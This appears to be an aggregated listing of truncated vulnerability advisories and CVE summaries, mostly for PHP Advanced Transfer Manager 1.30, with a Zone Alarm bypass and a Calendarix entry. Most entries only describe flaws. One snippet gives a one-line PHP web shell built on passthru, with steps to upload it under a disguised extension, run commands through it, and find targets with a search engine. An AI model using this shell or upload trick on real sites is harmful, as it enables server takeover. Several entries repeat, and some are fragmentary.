Zone Labs Zone Alarm 6.0 - Advance Program Control Bypass

Zone Labs Zone Alarm 6.0 - Advance Program Control Bypass source: https://www.securityfocus.com/bid/15347/info Zone Labs Zone Alarm is prone to a weakness that permits the bypassing of the Advanced Program Control protection. Reports indicate that applications can create a modal dialog box...

Zone Labs Zone Alarm 6.0 - Advance Program Control Bypass

source: https://www.securityfocus.com/bid/15347/info Zone Labs Zone Alarm is prone to a weakness that permits the bypassing of the Advanced Program Control protection. Reports indicate that applications can create a modal dialog box displaying HTML, which can then be redirected to a remote site...

Calendarix Advanced <= 1.5 Multiple Vulnerabilities - Active Check

Calendarix is prone to multiple vulnerabilities. SPDX-FileCopyrightText: 2005 Josh Zlatin-Amishav Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

uplod phpshell in PHP Advanced Transfer Manager

uplod phpshell in PHP Advanced Transfer Manager one save as the code : -------- pre ? passthru$GET'sQl'; ? -------- file save as sQl.php.ns now upload in the PHP Advanced Transfer Manager end the upload go to www.site.com/file upload name/files/sQl.php.ns?sQl=command linux search google : PHP...

PHP Advanced Transfer Manager 1.30 - Remote Unauthorized Access

PHP Advanced Transfer Manager 1.30 - Remote Unauthorized Access source: https://www.securityfocus.com/bid/15237/info PHP Advanced Transfer Manager can allow remote attackers to gain unauthorized access. Access to sensitive files containing authentication credentials is not restricted, therefore a...

PHP Advanced Transfer Manager 1.30 - Remote Unauthorized Access

source: https://www.securityfocus.com/bid/15237/info PHP Advanced Transfer Manager can allow remote attackers to gain unauthorized access. Access to sensitive files containing authentication credentials is not restricted, therefore an attacker can simply issue a GET request to obtain a user's...

[SA17134] PHP Advanced Transfer Manager HTML Upload Vulnerability

TITLE: PHP Advanced Transfer Manager HTML Upload Vulnerability SECUNIA ADVISORY ID: SA17134 VERIFY ADVISORY: http://secunia.com/advisories/17134/ CRITICAL: Moderately critical IMPACT: Cross Site Scripting WHERE: From remote SOFTWARE: PHP Advanced Transfer Manager 1.x...

PHP Advanced Transfer Manager Multiple Vulnerabilities

Secunia Advisory: SA16867 Release Date: 2005-09-20 Critical: Moderately critical Impact: Cross Site Scripting Exposure of system information Exposure of sensitive information Where: From remote Solution Status: Unpatched Software: PHP Advanced Transfer Manager 1.x Select a product and view a...

PHP Advanced Transfer Manager <= 1.30 Multiple Vulnerabilities

The version of PHP Advanced Transfer Manager on the remote host suffers from multiple information disclosure and cross-site scripting flaws. For example, by calling a text or HTML viewer directly, an unauthenticated attacker can view arbitrary files, provided PHP's 'registerglobals' setting is...

CVE-2005-2997

Multiple directory traversal vulnerabilities in PHP Advanced Transfer Manager 1.30 allow remote attackers to read arbitrary files via ".." sequences in 1 the currentdir parameter to txt.php, or the currentdir parameter to 2 htm.php or 3 html.php...

CVE-2005-2998

PHP Advanced Transfer Manager 1.30 has a default password for the administrator user, which allows remote attackers to upload and execute arbitrary PHP files...

CVE-2005-2999

PHP Advanced Transfer Manager 1.30 allows remote attackers to obtain sensitive PHP configuration information via a direct request to test.php...

CVE-2005-2997

CVE-2005-2997 affects PHP Advanced Transfer Manager 1.30. The vulnerability is a directory traversal flaw allowing remote attackers to read arbitrary files via .. sequences in the following parameters: currentdir to txt.php, current_dir to htm.php, or current_dir to html.php. This results in pote...

CVE-2005-2998

CVE-2005-2998 affects PHP Advanced Transfer Manager 1.30. The vulnerability involves a default administrator password that allows remote attackers to upload and execute arbitrary PHP files. Impact is described overall as partial confidentiality, integrity, and availability. No explicit remediatio...

CVE-2005-2999

Technical details about CVE-2005-2999 are not publicly provided in the supplied documents. Monitor for updates from official advisories for affected products, impact, and remediation.

CVE-2005-2998

PHP Advanced Transfer Manager 1.30 has a default password for the administrator user, which allows remote attackers to upload and execute arbitrary PHP files...

CVE-2005-3000

CVE-2005-3000 affects PHP Advanced Transfer Manager 1.30, with XSS vulnerabilities in viewers/txt.php. The vulnerability allows remote attackers to inject arbitrary script/HTML via the font, normalfontcolor, or mess[31] parameters, potentially affecting users who load the affected page. Root caus...

PHP Advanced Transfer Manager <= 1.30 Multiple Vulnerabilities

Binary data 3234.prm...

PHP Advanced Transfer Manager 1.30 - Multiple Directory Traversal Vulnerabilities

PHP Advanced Transfer Manager 1.30 - Multiple Directory Traversal Vulnerabilities source: https://www.securityfocus.com/bid/14883/info PHP Advanced Transfer Manager is prone to multiple directory traversal vulnerabilities. These issues are due to a failure in the application to properly sanitize...

PHP Advanced Transfer Manager 1.30 - Multiple Cross-Site Scripting Vulnerabilities

PHP Advanced Transfer Manager 1.30 - Multiple Cross-Site Scripting Vulnerabilities source: https://www.securityfocus.com/bid/14887/info PHP Advanced Transfer Manager is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitiz...